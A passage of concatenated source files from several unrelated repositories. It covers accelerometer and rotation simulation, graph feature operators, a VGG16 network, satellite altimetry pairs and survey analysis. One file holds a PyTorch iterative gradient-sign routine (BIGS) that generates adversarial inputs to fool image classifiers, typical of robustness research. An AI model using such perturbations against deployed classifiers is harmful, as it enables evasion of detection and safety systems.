sub-arrays with shape (3,)" def isScalarArrayOfDoubles( a: np.ndarray) -> bool: if not isinstance(a, np.ndarray): return False if len(np.shape(a)) != 1: return False if a.dtype != np.double(999).dtype: return False return True # tentative argument prefix naming convention: ( PEP8 does not specify how to name variables & arguments ) # as_xxx : an array of scalars ( i.e. a 1-dim array ) # av_xxx : an array of vectors ( i.e. a generic 2-dim array ) # av3_xxx: an array of vec3's # v3_xxx: a vec3 ( i.e. a 1-dim array of length 3 ) class TimeSeries: # self.t is an array of doubles ; i.e. t[i] is the i-th t-value # todo: store self.delta_t, an array of doubles ( more efficient for core computations ) # todo: provide self.getTArray() ( used mostly by plot utilities ) def __init__(self, as_t): assert (isScalarArrayOfDoubles(as_t)) self.t = as_t def __len__(self) -> int: return len(self.t) def delta_t(self, i : int ): return self.t[i+1]-self.t[i] class AccelData (TimeSeries): # self.a is an array of vec3's ; i.e. a[i] is an array of length 3 holding the acceleration vector at time t[i] # ( this is the opposite of the current AccelData, in which a[i] is an array of length n holding # the values of the i-th component of the acceleration vector for all time steps. # i.e. old layout : a[axis][time] # new layout : a[time][axis] def __init__(self, as_t, av3_a, sModelType = "unspecified model type" ): TimeSeries.__init__(self,as_t) assertIsArrayOfVec3(av3_a, context = "Accel constructor") ff = len(av3_a) jj = len(as_t) assert len(av3_a) == len(as_t) , "accel raw data not same length as time values" self.a = av3_a self.model = sModelType def getSingleAxis(self, axisIndex): return self.a[:,axisIndex] def AddNoise(self, magnitude): # for i in range(len(self)): self.a += np.array([ np.random.normal(0, magnitude, len(self)), np.random.normal(0, magnitude, len(self)), np.random.normal(0, magnitude, len(self)) ]).transpose() class RotaryData (TimeSeries): def __init__(self, as_t, as_omega): TimeSeries.__init__(self,as_t) assert isScalarArrayOfDoubles(as_omega), "RotaryData constructor" assert( len(as_omega)==len(self)) self.omega = as_omega def AddNoise(self, magnitude): self.omega += np.random.normal(0, magnitude, len(self)) ################ test ################ def test_DataStructures() -> None: v3_good = np.ndarray(shape=(3,), dtype=np.double) v3_bad1 = np.ndarray(shape=(2,), dtype=np.double) v3_bad2 = np.ndarray(shape=(3,2), dtype=np.double) v3_bad3 = np.ndarray(shape=(10,3), dtype=np.double) v3_bad4 = np.ndarray(shape=(3,), dtype=np.int) assert(isVec3(v3_good)) assert(not isVec3(v3_bad1)) assert(not isVec3(v3_bad2)) assert(not isVec3(v3_bad3)) assert(not isVec3(v3_bad4)) av3_good = np.ndarray(shape=(10,3), dtype=np.double) av3_bad1 =np.ndarray(shape=(3,), dtype=np.double) av3_bad2 =np.ndarray(shape=(10,4), dtype=np.double) av3_bad3 = list([[1,2,3],[4,5,6]]) assert(isArrayOfVec3(av3_good)) assert(not isArrayOfVec3(av3_bad1)) assert(not isArrayOfVec3(av3_bad2)) assert(not isArrayOfVec3(av3_bad3)) t = np.ndarray(shape=(10,), dtype=np.double) ad = AccelData(t,av3_good) t_bad = np.ndarray(shape=(9,), dtype=np.double) av3_good[0] = [1,2,3] av3_good[1] = [4,5,6] av3_good[2] = [7,8,9] xValues = ad.getSingleAxis(axisIndex=0) print('x values ', xValues[:3]) xValues = ad.getSingleAxis(axisIndex=2) print('z values ', xValues[:3]) if __name__ == "__main__" : test_DataStructures() ``` #### File: src/modules/LoadOmega.py ```python import numpy as np from modules.Tools import dialogOpenFilename from modules.DataStructures 
import RotaryData def Load_Omega(filepath=None): if(filepath == None): filepath = dialogOpenFilename() block = np.loadtxt(filepath, dtype=float, delimiter=',', usecols=(0,1), unpack=True, skiprows=2) return RotaryData(block[0], block[1]) ``` #### File: src/modules/Load.py ```python from modules.LoadAccel import * from modules.LoadOmega import * import os from tkinter import * defaultdir = "../data" def LoadDataSet(dirpath=None): if(dirpath==None): root = Tk() root.withdraw() dirpath = filedialog.askdirectory(parent=root,initialdir=defaultdir,title='Please select a dataset') files = os.listdir(dirpath) print("-------Found "+str(len(files))+ " files-------") for i in files: print("Found: "+i) print("----------------------------") i = 1 runs_files = [] while(True): run = list(filter(lambda x: x == "run"+str(i), files)) if(run != []): runs_files += run else: break i+=1 print("Found "+str(len(runs_files))+" runs") runs_data = [] for run in runs_files: print("\n\n-----------------"+run+"-----------------") runs_data.append(LoadRun(dirpath+"/"+run+"/")) return runs_data # load a single AccelData object and RotaryData object # simpler front-end for LoadRun() def LoadSingleRun( dirpath=None): run = LoadRun(dirpath) return { "accel": run["accel"][0], "omega": run["omega"][0]} # deprecated: def LoadRun(dirpath=None): return LoadMultiRun(dirpath) # Load multiple runs as a list of AccelData objects and list of RotaryData objects def LoadMultiRun(dirpath=None): if(dirpath==None): root = Tk() root.withdraw() dirpath = filedialog.askdirectory(parent=root,initialdir=defaultdir,title='Please select a run') found_files = os.listdir(dirpath) print("-------Found "+str(len(found_files))+ " files-------") for i in found_files: print("Found: "+i) print("The Following Files Will be Ignored:") not_file = list(filter(lambda x: ((x.split(".")[type_index]!="accel" and x.split(".")[type_index]!="omega") or x.split(".")[-1].lower()!="csv" or len(x.split(".")) != 4 ), found_files)) for i in not_file: print("- "+i+("(Wrong File Structure)" if len(i.split(".")) != 4 else "(Wrong File Format)" if i.split(".")[-1].lower()!="csv" else "(Unsupported Type)" if i.split(".")[type_index]!="accel" and i.split(".")[type_index]!="omega" else "" )) if(not_file == []): print("--None--") print("----------------------------") files = list(filter(lambda x: not_file.count(x) == 0, found_files)) accels_files = list(filter(lambda x: x.split(".")[type_index]=="accel", files)) accels_data = [] for file in accels_files: print("processing "+file+"...") data = LoadAccelFile(dirpath+"/"+file) if(data != "Model is not currently supported"): accels_data.append(data) else: print("Failed to Load: "+file+" (Model not supported)") omega_files = list(filter(lambda x: x.split(".")[type_index]=="omega", files)) omega_data = [] for file in omega_files: print("processing "+file+"...") omega_data.append(Load_Omega(filepath=str(dirpath+"/"+file))) if accels_data == [] and omega_data == []: raise FileNotFoundError('No files were found.') return {"accel": accels_data, "omega": omega_data} ``` #### File: src/modules/Simulate.py ```python from modules import Tools from modules.DataStructures import * from modules.Cluster import * import math # region Generic AlphaSim Functions def AlphaSim_ConstOmegaPositive(): return def AlphaSim_ConstOmegaChangesSign(): return def AlphaSim_Piecewise1(t): if t < 0: return 1 elif 0 <= t < 0.5: return 0.5 elif 0.5 <= t < 1: return 0.25 elif 1 <= t: return 0.5 def AlphaSim_Piecewise2(t): if t < -2: return t * 1.5 elif -2 <= t < 5: 
return math.sin(t) elif 5 <= t < 7: return 0.5 elif 7 <= t: return math.cos(t) def AlphaSim_Sinusoidal1(t): A = 2 omega = 1 phaseConstant = 0 return A * math.sin(omega * t + phaseConstant) def AlphaSim_GenerateAlphaArray(alphaFunc, N, deltaT): typeofA = 'f' try: alphaFunc(0) typeofA = 'f' except: try: alphaFunc = float(alphaFunc) typeofA = 'n' except: raise ValueError('A must be a function or a number') array = [] for i in range(N): array.append(alphaFunc(i * deltaT) if typeofA == 'f' else alphaFunc) return array # endregion # alphaFn is always a function # constant-value alpha is accomplished by feeding a const-value function # return a RotaryData object def RotaryData_CreateFromAlphaFunction( alphaFn, N, deltaT, omegaInitial=0, ): try: float(alphaFn(0)) # if A can be converted to a float, this won't raise an Error except: raise ValueError('alphaFn must be a function that returns a single number') omega = np.array([np.double(omegaInitial)] * N) time = np.array([np.double(0.0)] * N) for i in range(1, N): omega[i] = omega[i - 1] + alphaFn(i * deltaT) * deltaT # small check to verify the value of typeofA time[i] = i * deltaT return RotaryData(time, omega) # returns nothing: rotData itself is modified def RotaryData_AddNoise( rotData: RotaryData, magnitude: float ): return RotaryData(rotData.t, rotData.omega + np.random.normal(0, magnitude, len(rotData))) # generate simulated AccelData for a sensor at radial distance of "radius" # starting from a rotary-sensor signal "omegaData" # returns a AccelData object def AccelData_CreateFromRotary( rotData : RotaryData, radius : float): deltaT = rotData.t[1] - rotData.t[0] a = [] for i in range(len(rotData) - 1): a.append([ rotData.omega[i] ** 2 * radius, radius * (rotData.omega[i + 1] - rotData.omega[i]) / deltaT, 0 ]) a = np.array(a) return AccelData(rotData.t[:-1], a, "synthetic data") def AccelData_CreateFromRotary2( rotData : RotaryData, radius : float): deltaT = rotData.t[1] - rotData.t[0] a = [] for i in range(len(rotData) - 1): arfoo = rotData.omega[i] ** 2 * radius arnextfoo = rotData.omega[i+1] ** 2 * radius atfoo = radius * (rotData.omega[i + 1] - rotData.omega[i]) / deltaT cluster = Cluster_CreateFromCell(Cell(arfoo,atfoo,deltaT), radius) # print(cluster.ar_next - arnextfoo) # print(cluster.costDeltaOmega(4)) a.append([ arfoo, atfoo, 0 ]) aout = np.array(a) for i in range(len(a)-1): cluster2 = Cluster_CreateFromAccelData(AccelData(rotData.t[:-1], aout, "synthetic data"), i) print(cluster2.ar_next-a[i+1][0]) print(cluster2.costDeltaOmega(4)) return AccelData(rotData.t[:-1], aout, "synthetic data") # rotate all vectors counterclockwise by an amount "angle" def AccelData_Rotate( ad : AccelData, angle : float ): a = ad.a for i in range(len(a)): a[i] = Tools.rotate_vec3(a[i], angle) ad.a = a return ad # add gaussian noise to the components on all 3 axes def AccelDat_AddNoise( ad : AccelData, magnitude : float ): ad.a += np.array([ np.random.normal(0, magnitude, len(ad.a)), np.random.normal(0, magnitude, len(ad.a)), np.random.normal(0, magnitude, len(ad.a)) ]).transpose() return ad # ======================== Example for radius and alpha functions ======================== def example_radius(x): # the function must have only one input which is a number out = 4*x # stuff happens here... 
return out # the function must return a single numerical value ``` #### File: src/tests/devTest_Optimizer_Normal.py ```python import matplotlib.pyplot as plt import numpy as np from modules.Optimizers import * from modules.Simulate import * def alphaFn(x): return 1 def grad_approx(fn, x, qual, *params): return ( fn(x + qual, *params) - fn(x - qual, *params) ) / (2 * qual) acc_data = AccelData_CreateFromRotary(RotaryData_CreateFromAlphaFunction(alphaFn, 52, 0.1), 4) def cost_SimpleRadial(r, ar, ar_next, at, dt): ardot = (ar_next - ar) / dt term2 = np.square(at) * dt / r term3 = 2 * at * np.sqrt(ar / r) return np.square(ardot - term2 - term3) fn = cost_SimpleRadial index = 20 parameters = { 'ar': acc_data.a[index][0], 'ar_next': acc_data.a[index + 1][0], 'at': acc_data.a[index][1], 'dt': acc_data.delta_t(index) } Adam = AdamOptimizer_1D(cost_SimpleRadial) Adam.config(['x0', 2]) Adam.FillParameters(*list(parameters.values())) x = Adam.Optimize(alpha=0.01, beta1=0.9, beta2=0.999, return_array=True) it = 50 out = [] for i in range(len(x)): if i % it == 0: out.append(x[i]) if out[-1] != x[-1]: out.append(x[-1]) out = np.array(out) print(out[-1], out[0]) time = np.arange(out[-1] - 3, out[0] + 3, 0.1) if out[-1] < out[0] else np.arange(out[0] - 3, out[-1] + 3, 0.1) plt.plot(time, fn(time, *list(parameters.values())), color='blue') plt.plot(out, fn(out, *list(parameters.values())), 'o', color='green') plt.plot(out[0], fn(out[0], *list(parameters.values())), 'o', color='black') plt.annotate('Start', (out[0], fn(out[0], *list(parameters.values())))) origins = out, fn(out, *list(parameters.values())) gradients = -grad_approx(fn, out, 0.00001, *list(parameters.values()))*0.00001 plt.quiver(*origins, gradients, 0, color='purple', width=0.005) i = 0.80 k = 0.65 for item in parameters: # This figtext value-bound string print method is exactly how print in python2.7 works plt.figtext(k, i, item + ": " + str("%.1f" % parameters[item]) + ";", color='red', fontsize="large") i -= 0.05 plt.ylim(-1, 100) plt.ylabel('cost') plt.xlabel('radius') plt.show() ``` #### File: src/tests/Test_Curvature.py ```python from modules.Load import * from modules.Curvature import * from modules.Simulate import * import matplotlib.pyplot as plt _range = [13, 18] if __name__ == "__main__": use_range = True if input("use time range? (y/n): ") == "y" else False use_synthetic_data = True if input("use synthetic data? (y/n): ") == "y" else False if use_range: _range = [float(input("Beginning: ")), float(input("End: "))] if use_synthetic_data: if True if input("use omega file? 
(y/n): ") == "y" else False: o = LoadRun()["omega"][0] else: o = RotaryData_CreateFromAlphaFunction( N=int(input("Number of iterations: ")), deltaT=np.float32(input("Delta t: ")), alphaFn=np.float32(input("alpha: ")), omegaInitial=np.float32(input("omega at t=0: ")) ) acceldat = AccelData_CreateFromRotary(o, np.float32(input("Radius: "))) else: acceldat = LoadRun()["accel"][0] else: use_range = False use_synthetic_data = False acceldat = LoadAccelFile("../../data/2019 06 12/0 degrees/run1/run1.accel.x2.CSV") if use_range: mask = np.logical_not((_range[0] <= acceldat.t[:-1]) ^ (_range[1] >= acceldat.t[:-1])) else: mask = np.array([True]*len(acceldat.t[:(-1 if not use_synthetic_data else -2)])) adot = GenADot(acceldat)[mask] yx2 = Genyx2(acceldat)[mask] if __name__ != "__main__": def close_event(): plt.close() #timer calls this function after 3 seconds and closes the window fig = plt.figure() timer = fig.canvas.new_timer(interval = 1000) #creating a timer object and setting an interval of 3000 milliseconds timer.add_callback(close_event) timer.start() plt.scatter(yx2, np.square(adot)) plt.show() ```
{ "source": "Aaanonymousss/G4P", "score": 3 }
#### File: G4P/dgp_graph/my_op.py
```python
import numpy as np
import tensorflow as tf


def neighbour_feats(adj, x):
    # in: adj(n, n), x(n, feat)
    # out: selected(n, n*feat)
    a_ = np.expand_dims(adj, axis=-1)  # note the location of expanding
    selected = a_ * x
    return selected.reshape(x.shape[0], -1)


def tf_neighbour_feats(adj, x):
    # in: adj(n, n), x(n, feat)
    # out: selected(n, n*feat)
    a_ = tf.expand_dims(adj, axis=-1)  # note the location of expanding
    selected = a_ * x
    return tf.reshape(selected, (x.shape[0], -1))


def neighbour_feats3d(adj, batch_x):
    # adj(n, n), batch_x(batch, n, feat)
    # out: selected(batch, n, n*feat)
    a_ = np.expand_dims(adj, axis=-1)
    x_ = np.expand_dims(batch_x, axis=1)  # note the location of expanding
    selected = a_ * x_
    return selected.reshape(batch_x.shape[0], batch_x.shape[1], -1)


def tf_neighbour_feats3d(adj, batch_x):
    # adj(n, n), batch_x(batch, n, feat)
    # out: selected(batch, n, n*feat)
    a_ = tf.expand_dims(adj, axis=-1)
    x_ = tf.expand_dims(batch_x, axis=1)  # note the location of expanding
    selected = a_ * x_
    x_shape = tf.shape(batch_x)
    return tf.reshape(selected, (x_shape[0], x_shape[1], -1))


def test_neighbour_feats():
    a = np.random.randint(0, 2, size=(3, 3))
    a += a.T
    a[a > 1] = 1
    bx = np.random.randint(1, 10, size=(2, 3, 2))
    x = bx[0]
    assert np.array_equal(neighbour_feats(a, x),
                          np.stack([a * x[:, i] for i in range(2)], axis=-1).reshape(3, -1))
    assert np.array_equal(neighbour_feats3d(a, bx),
                          np.stack([neighbour_feats(a, bx[i]) for i in range(2)], axis=0).reshape(2, 3, -1))


def neighbour_feats_sum(adj, X):
    # compatible with batched X
    return np.matmul(adj, X)


def tf_neighbour_feats_sum(adj, X):
    # compatible with batched X
    return adj @ X


func_dict = dict(
    nbf_sum=neighbour_feats_sum,
    nbf_concat=neighbour_feats,
    nbf_concat3d=neighbour_feats3d,
    tf_nbf_sum=tf_neighbour_feats_sum,
    tf_nbf_concat=tf_neighbour_feats,
    tf_nbf_concat3d=tf_neighbour_feats3d,
)


def get_nbf_op(name, is_tf=False):
    func_name = 'tf_nbf_' + name if is_tf else 'nbf_' + name
    func = func_dict.get(func_name, None)
    if func is None:
        raise NotImplementedError('required func {}(is_tf={}) is not implemented'.format(name, is_tf))
    return func
```
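A small usage sketch for the neighbour-feature operators above. It is not part of the repository, and the `dgp_graph.my_op` import path is only inferred from the file location.
```python
# Assumed usage sketch: pick the NumPy variants of the neighbour-feature ops
# and apply them to a tiny 3-node graph with 2 features per node.
import numpy as np
from dgp_graph.my_op import get_nbf_op  # import path inferred from the file layout

adj = np.array([[0, 1, 1],
                [1, 0, 0],
                [1, 0, 0]], dtype=np.float64)
x = np.random.rand(3, 2)

nbf_concat = get_nbf_op('concat')       # is_tf=False selects the NumPy implementation
print(nbf_concat(adj, x).shape)         # (3, 6): each node gets n * feat concatenated features

nbf_sum = get_nbf_op('sum')
print(nbf_sum(adj, x).shape)            # (3, 2): neighbour features summed per node
```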
{ "source": "aaaqhbd/psa", "score": 3 }
#### File: psa/network/vgg16_subcls.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F

import network.vgg16d


class Net(network.vgg16d.Net):
    def __init__(self):
        super(Net, self).__init__()

        self.dim = [1024]

        self.drop7 = nn.Dropout2d(p=0.5)

        self.fc8 = nn.Conv2d(1024, 20, 1, bias=False)
        torch.nn.init.xavier_uniform_(self.fc8.weight)
        self.fc8sub = nn.Conv2d(1024, 20 * 10, 1, bias=False)
        torch.nn.init.xavier_uniform_(self.fc8sub.weight)

        self.not_training = [self.conv1_1, self.conv1_2, self.conv2_1, self.conv2_2]
        self.from_scratch_layers = [self.fc8, self.fc8sub]

    def forward(self, x):
        x = super().forward(x)
        x = self.drop7(x)

        xf = F.avg_pool2d(x, kernel_size=(x.size(2), x.size(3)), padding=0)

        xp = self.fc8(x)
        xsub = self.fc8sub(x)

        xsub = F.avg_pool2d(xsub, kernel_size=(x.size(2), x.size(3)), padding=0)
        xp = F.avg_pool2d(xp, kernel_size=(x.size(2), x.size(3)), padding=0)

        xsub = xsub.view(-1, 20 * 10)
        xp = xp.view(-1, 20)

        return xf, xp, xsub

    def forward_cam(self, x):
        x = super().forward(x)
        x = self.fc8(x)
        x = F.relu(x)
        x = torch.sqrt(x)
        return x

    def fix_bn(self):
        self.bn8.eval()
        self.bn8.weight.requires_grad = False
        self.bn8.bias.requires_grad = False

    def get_parameter_groups(self):
        groups = ([], [], [], [])

        for m in self.modules():
            if (isinstance(m, nn.Conv2d) or isinstance(m, nn.BatchNorm2d)):
                if m.weight is not None and m.weight.requires_grad:
                    if m in self.from_scratch_layers:
                        groups[2].append(m.weight)
                    else:
                        groups[0].append(m.weight)
                if m.bias is not None and m.bias.requires_grad:
                    if m in self.from_scratch_layers:
                        groups[3].append(m.bias)
                    else:
                        groups[1].append(m.bias)

        return groups
```
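One plausible way to consume `get_parameter_groups()` is sketched below; this is an assumed example rather than code from the repository, and the learning rates and weight decay values are illustrative only.
```python
# Assumed usage sketch: pass the four parameter groups (pretrained weights,
# pretrained biases, from-scratch weights, from-scratch biases) to SGD with
# per-group learning rates.
import torch
from network.vgg16_subcls import Net

model = Net()
g = model.get_parameter_groups()
optimizer = torch.optim.SGD([
    {'params': g[0], 'lr': 0.01, 'weight_decay': 5e-4},
    {'params': g[1], 'lr': 0.02, 'weight_decay': 0},
    {'params': g[2], 'lr': 0.10, 'weight_decay': 5e-4},
    {'params': g[3], 'lr': 0.20, 'weight_decay': 0},
], momentum=0.9)
```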
{ "source": "AAArdu/adversarialML", "score": 3 }
#### File: _func/Attack/BIGS.py
```python
from advML.function import advML_deep_package
import torch.nn as nn
import torch


def BIGS(model, input, lable, epsilon, times):
    if advML_deep_package == 'pytorch':
        from torch.nn import Module
        from torch import Tensor
        assert isinstance(model, Module), 'Model should be a child-class of Module'
        assert isinstance(input, Tensor), 'Input should be a Tensor'
        assert isinstance(lable, Tensor), 'Lable should be a Tensor'
        return BIGS_pytorch(model, input, lable, epsilon, times)
    else:
        raise NotImplementedError("The deep package is unsupported!")


def BIGS_pytorch(model, input, lable, epsilon, times):
    criterion = nn.CrossEntropyLoss()
    original_input = input.clone().detach()   # clean input, used as the centre of the epsilon-ball
    perturbed_input = input.clone().detach()  # work on a copy so the caller's tensor is left untouched
    for i in range(times):
        perturbed_input.requires_grad = True
        predict = model(perturbed_input)
        loss = criterion(predict, lable)
        model.zero_grad()
        loss.backward()
        with torch.no_grad():
            perturbed = 0.01 * perturbed_input.grad.data.sign()  # fixed step size per iteration
            # clip against the original input so the accumulated perturbation stays within epsilon
            perturbed_input = Clip(original_input, perturbed_input + perturbed, epsilon)
    return perturbed_input


def Clip(original, input, epsilon):
    # keep each value within [original - epsilon, original + epsilon], then within the valid range [0, 1]
    input = torch.where(input > original - epsilon, input, original)
    input = torch.where(input < original + epsilon, input, original)
    return torch.clamp(input, 0, 1)
```
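A hypothetical usage sketch follows; the model, tensors, and import path are stand-ins, and it assumes `advML` is configured so that `advML_deep_package` equals `'pytorch'`.
```python
# Hypothetical usage sketch: attack a small stand-in classifier.
import torch
import torch.nn as nn
from advML._func.Attack.BIGS import BIGS  # import path guessed from the file layout

model = nn.Sequential(nn.Flatten(), nn.Linear(28 * 28, 10))
x = torch.rand(1, 1, 28, 28)   # clean input in [0, 1]
y = torch.tensor([3])          # ground-truth label

x_adv = BIGS(model, x, y, epsilon=0.03, times=10)
print((x_adv - x).abs().max())  # size of the largest per-element perturbation
```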
{ "source": "aaarendt/PointDatabase", "score": 3 }
#### File: aaarendt/PointDatabase/ATL06_pair.py
```python
import numpy as np


class ATL06_pair:
    def __init__(self, D6=None, pair_data=None):
        if D6 is not None:
            # initializes based on input D6, assumed to contain one pair
            # 2a. Set pair_data x and y
            self.x = np.mean(D6.x_atc)  # mean of the pair, nan if not both defined
            self.y = np.mean(D6.y_atc)
            self.dh_dx = D6.dh_fit_dx
            self.dh_dx.shape = [1, 2]
            self.dh_dy = np.mean(D6.dh_fit_dy)
            self.delta_time = np.mean(D6.delta_time)
            self.segment_id = np.mean(D6.segment_id)
            self.cycle = np.mean(D6.cycle_number)
            self.h = D6.h_li
            self.h.shape = [1, 2]
            self.valid = np.zeros(1, dtype='bool')
        elif pair_data is not None:
            # initializes based on a list of pairs, to produce a structure with numpy arrays for fields
            for field in ('x', 'y', 'dh_dx', 'dh_dy', 'delta_time', 'segment_id', 'cycle', 'h', 'valid'):
                setattr(self, field, np.c_[[getattr(this_pair, field).ravel() for this_pair in pair_data]])
        else:
            # initializes an empty structure
            for field in ('x', 'y', 'dh_dx', 'dh_dy', 'delta_time', 'segment_id', 'cycle', 'h', 'valid'):
                setattr(self, field, np.NaN)

    def __getitem__(self, key):
        temp06 = ATL06_pair()
        for field in ('x', 'y', 'dh_dx', 'dh_dy', 'delta_time', 'segment_id', 'cycle', 'h', 'valid'):
            temp_field = getattr(self, field)
            # setattr needs the field name as well as the sliced value
            if len(temp_field.shape) > 1 and temp_field.shape[1] > 1:
                setattr(temp06, field, temp_field[key, :])
            else:
                setattr(temp06, field, temp_field[key])
        return temp06
```
{ "source": "aaarendt/surveyhelper", "score": 3 }
#### File: surveyhelper/surveyhelper/question.py ```python from itertools import compress import pandas as pd import numpy as np from abc import ABCMeta, abstractmethod from surveyhelper.scale import QuestionScale, LikertScale, NominalScale, OrdinalScale from scipy.stats import ttest_ind, f_oneway, chisquare class MatrixQuestion: __metaclass__ = ABCMeta def __init__(self, text, label, questions): self.text = text self.questions = questions self.label = label self.assert_questions_same_type() self.assert_choices_same() self.assign_children_to_matrix() def exclude_choices_from_analysis(self, choices): for q in self.questions: q.exclude_choices_from_analysis(choices) def reverse_choices(self): for q in self.questions: q.reverse_choices() def change_scale(self, newtype, values = None, midpoint = None): for q in self.questions: q.change_scale(newtype, values, midpoint) def change_midpoint(self, midpoint): for q in self.questions: q.scale.midpoint = midpoint def get_scale(self): if len(self.questions) > 0: return(self.questions[0].scale) else: None def assert_questions_same_type(self): if all(type(x) == type(self.questions[0]) for x in self.questions): return(True) else: raise(Exception("Questions in a matrix must all have the same type")) def assert_choices_same(self): if all([x.scale == self.questions[0].scale for x in self.questions]): return(True) else: raise(Exception("Questions in a matrix must all have the same choices")) def assign_children_to_matrix(self): for q in self.questions: q.matrix = self return def get_variable_names(self): names = [] for q in self.questions: names += q.get_variable_names() return(names) def get_children_text(self): return([q.text for q in self.questions]) def pretty_print(self, show_choices=True): print("{} ({})".format(self.text, self.label)) if show_choices: self.questions[0].pretty_print_choices() for q in self.questions: print(q.text) @abstractmethod def get_choices(self): pass @abstractmethod def frequency_table(self): pass def freq_table_to_json(self, df): return('') def questions_to_json(self): return('') class SelectOneMatrixQuestion(MatrixQuestion): def get_choices(self, remove_exclusions=True, show_values=False): self.assert_choices_same() if len(self.questions) > 0: return(self.questions[0].scale.choices_to_str(remove_exclusions, show_values)) else: return([]) def frequency_table(self, df, show="ct", pct_format=".0%", remove_exclusions = True, show_totals=True, show_mean=True, mean_format=".1f"): if len(self.questions) == 0: return(pd.DataFrame()) data = [] if show == "ct": for q in self.questions: data.append(q.frequency_table(df, False, True, False, pct_format, remove_exclusions, show_totals, show_mean, ).iloc[:,0].tolist()) elif show == "pct": for q in self.questions: data.append(q.frequency_table(df, False, False, True, pct_format, remove_exclusions, show_totals, show_mean ).iloc[:,0].tolist()) else: raise(Exception("Invalid 'show' parameter: {}".format(show))) tbl = pd.DataFrame(data) tmpcols = self.get_choices(remove_exclusions) if show_totals: tmpcols.append("Total") if show_mean: tmpcols.append("Mean") tbl.columns = tmpcols tbl["Question"] = self.get_children_text() cols = tbl.columns.tolist() cols = cols[-1:] + cols[:-1] tbl = tbl[cols] return(tbl) def cut_by_question(self, other_question, response_set, cut_var_label=None, question_labels=None, pct_format=".0%", remove_exclusions=True, show_mean=True, mean_format=".1f"): if type(other_question) != SelectOneQuestion: raise(Exception("Can only call cut_by_question on a SelectOneQuestion 
type")) groups = response_set.groupby(other_question.label) group_mapping = dict(zip(other_question.values, other_question.choices)) oth_text = cut_var_label if not oth_text: oth_text = other_question.text return(self.cut_by(groups, group_mapping, oth_text, question_labels, pct_format, remove_exclusions, show_mean, mean_format)) def cut_by(self, groups, group_label_mapping, cut_var_label, question_labels=None, pct_format=".0%", remove_exclusions=True, show_mean=True, mean_format=".1f"): results = [] labels = question_labels if not labels: labels = [q.text for q in self.questions] for q, l in zip(self.questions, labels): r = q.cut_by(groups, group_label_mapping, cut_var_label, l, pct_format, remove_exclusions, show_mean, mean_format) # r.columns = pd.MultiIndex.from_tuples([(q.text, b) for a, b in # r.columns.tolist()]) results.append(r.T) return(pd.concat(results)) def freq_table_to_json(self, df): t = self.frequency_table(df, "ct", "", True, False, False, "") return(t.iloc[:, 1:].to_json(orient="records")) def questions_to_json(self): df = pd.DataFrame({"Question": self.get_children_text()}) return(df.to_json(orient="records")) def graph_type(self): if len(self.questions) > 0: if type(self.questions[0].scale) == LikertScale: return('diverging_bar') else: return('horizontal_stacked_bar') else: return('') class SelectMultipleMatrixQuestion(MatrixQuestion): def get_choices(self, remove_exclusions=True): self.assert_choices_same() if len(self.questions > 0): return(self.questions[0].get_choices(remove_exclusions)) else: [] def frequency_table(self, df, show="ct", pct_format=".0%", remove_exclusions = True, show_totals=True): data = [] if show == "ct": for q in self.questions: data.append(q.frequency_table(df, False, True, False, False, pct_format, remove_exclusions, False).iloc[:,0].tolist()) elif show == "pct_respondents": for q in self.responses: data.append(q.frequency_table(df, False, False, True, False, pct_format, remove_exclusions, False).iloc[:,0].tolist()) elif show == "pct_responses": for q in self.responses: data.append(q.frequency_table(df, False, False, False, True, pct_format, remove_exclusions, False).iloc[:,0].tolist()) else: raise(Exception("Invalid 'show' parameter: {}".format(show))) tbl = pd.DataFrame(data) tbl.columns = self.get_choices(remove_exclusions) tbl["Question"] = self.get_children_text() cols = tbl.columns.tolist() cols = cols[-1:] + cols[:-1] tbl = tbl[cols] if show_totals: tots = [] for q in self.questions: tots.append(q.get_total_respondents(df)) tbl["Total Respondents"] = tots return(tbl) class SelectQuestion: __metaclass__ = ABCMeta def get_total_respondents(self, df): freqs, resp, nonresp = self.tally(df) return(resp) def get_scale(self): return(self.scale) def change_scale(self, newtype, values = None, midpoint = None): self.scale = QuestionScale.change_scale(self.scale, newtype) def change_midpoint(self, midpoint): self.scale.midpoint = midpoint def exclude_choices_from_analysis(self, choices): self.scale.exclude_choices_from_analysis(choices) @abstractmethod def get_variable_names(self): pass @abstractmethod def pretty_print(self): pass @abstractmethod def pretty_print_choices(self): pass @abstractmethod def tally(self): pass @abstractmethod def frequency_table(self): pass def questions_to_json(self): return('') class SelectOneQuestion(SelectQuestion): def __init__(self, text, var, choices, label, values, exclude_from_analysis, matrix=None, scale_type='likert'): self.text = text self.label = label self.variable = var self.matrix = matrix self.scale = 
QuestionScale.create_scale(scale_type, choices, exclude_from_analysis, values) def get_variable_names(self): return([self.variable]) def pretty_print(self, show_choices=True): print("{} ({})".format(self.text, self.label)) if show_choices: self.pretty_print_choices() def pretty_print_choices(self): print(", ".join(self.scale.choices_to_str(False))) def reverse_choices(self): self.scale.reverse_choices() def mean(self, df, remove_exclusions=True): values = self.scale.get_values(remove_exclusions) freq, n, x = self.tally(df, remove_exclusions) num = sum([ct * v for ct, v in zip(freq, values)]) if n > 0: return(num/n) else: return(np.nan) def tally(self, df, remove_exclusions=True): """ Returns ([response frequencies], respondents, nonrespondents) tuple where response frequencies is a count of responses for each answer choice in order. """ unit_record = df[self.variable] freqs = dict(unit_record.value_counts()) cts = [] values = self.scale.get_values(remove_exclusions) for k in values: if k in freqs: cts.append(freqs[k]) else: cts.append(0) return((cts, sum(cts), len(unit_record)-sum(cts))) def frequency_table(self, df, show_question=True, ct=True, pct=True, pct_format=".0%", remove_exclusions=True, show_totals=True, show_mean=True, mean_format=".1f", show_values=True): cts, resp, nonresp = self.tally(df, remove_exclusions) data = [] cols = [] tots = [] mean = [] if show_question: data.append(self.scale.choices_to_str(remove_exclusions, show_values)) cols.append("Answer") tots.append("Total") mean.append("Mean") if ct: data.append(cts) cols.append("Count") tots.append(resp) mean.append(format(self.mean(df, remove_exclusions), mean_format)) if pct: l = [] for x in cts: if resp > 0: l.append(format(x/resp, pct_format)) else: l.append("-") data.append(l) cols.append("%") tots.append(format(1, pct_format)) if not ct: mean.append(format(self.mean(df, remove_exclusions), mean_format)) else: mean.append("") tbl = pd.DataFrame(data).T tbl.columns = cols if show_totals: tbl.loc[len(tbl)] = tots if show_mean: tbl.loc[len(tbl)] = mean return(tbl) def cut_by_question(self, other_question, response_set, cut_var_label=None, question_label=None, pct_format=".0%", remove_exclusions=True, show_mean=True, mean_format=".1f"): if type(other_question) != SelectOneQuestion: raise(Exception("Can only call cut_by_question on a SelectOneQuestion type")) df = response_set.data.copy() # Here we remove the exclusions 